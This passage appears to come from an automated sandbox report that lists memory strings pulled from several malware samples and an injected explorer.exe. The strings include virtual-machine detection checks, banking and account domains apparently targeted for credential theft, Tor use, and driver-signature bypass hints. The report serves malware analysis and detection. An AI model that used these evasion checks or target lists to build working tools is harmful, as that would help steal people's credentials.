            Source: DB15.exe, 00000011.00000002.4519701063.00000000005A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@Ld%SystemRoot%\system32\mswsock.dll~~H]
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s|%s%s|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
            Source: 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: main.isRunningInsideVMWare
            Source: explorer.exe, 00000022.00000003.3298755838.000000000C091000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}": 0 } }bL
            Source: explorer.exe, 00000022.00000003.3298043524.000000000C271000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
            Source: explorer.exe, 00000022.00000003.3298755838.000000000C091000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: explorer.exe, 00000022.00000003.3200607811.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3193896166.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4538945131.0000000009283000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4418026226.0000000009283000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\swenum.inf_loc
            Source: explorer.exe, 00000022.00000003.3249356607.000000000C05A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000464b
            Source: explorer.exe, 00000022.00000003.3193896166.00000000092EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4VMware Virtual disk SCSI Disk Devicep3
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: vmhgfsP
            Source: explorer.exe, 00000002.00000000.2110113315.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
            Source: explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter8-port with 1068e
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
            Source: explorer.exe, 00000002.00000000.2106796270.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: explorer.exe, 00000002.00000000.2110427730.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstart task: %wstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
            Source: explorer.exe, 00000022.00000003.3298755838.000000000C091000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
            Source: explorer.exe, 00000002.00000000.2110427730.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
            Source: DB15.exe, 00000013.00000002.4525021781.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\0-
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: explorer.exe, 00000002.00000000.2106796270.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.2110113315.000000000978C000.00000004.00000001.00020000.00000000.sdmp, DB15.exe, 0000000C.00000003.2830885638.0000000000776000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 0000000C.00000002.2840859633.0000000000718000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 0000000C.00000002.2840859633.0000000000776000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000011.00000002.4519701063.0000000000641000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000003.2851421571.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4517742104.0000000000548000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4517742104.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000003.2978332467.0000000000726000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2982508997.0000000000726000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2980820218.0000000000698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: 11VBoxSFWINDIRWD
            Source: 71C9.exe, 0000001D.00000002.3177865561.000000000123E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
            Source: explorer.exe, 00000002.00000000.2110427730.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: aryvmcixn-SR-%W
            Source: explorer.exe, 00000022.00000002.4548475747.000000000C05A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: explorer.exe, 00000022.00000003.3196669836.000000000943F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
            Source: build2.exe, 00000029.00000002.3569722785.00000000008F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
            Source: explorer.exe, 00000022.00000003.3309134937.000000000C16B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}y
            Source: explorer.exe, 00000022.00000003.3304971546.000000000C16B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
            Source: explorer.exe, 00000022.00000003.3306212746.000000000C259000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:***@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
            Source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: tVMSrvcs|!
            Source: explorer.exe, 00000002.00000000.2106796270.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
            Source: A0B.exe, 00000017.00000003.3011732883.0000000001490000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3114615460.000000000148E000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3124819163.0000000001492000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3115958213.0000000001490000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW7
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: DB15.exe, 00000016.00000003.2978332467.0000000000726000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2982508997.0000000000726000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000003.2977655775.0000000000726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW|y
            Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
            Source: explorer.exe, 00000002.00000000.2113563254.000000000C474000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $me#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
            Source: explorer.exe, 00000022.00000003.3248989137.000000000C148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000D&@v
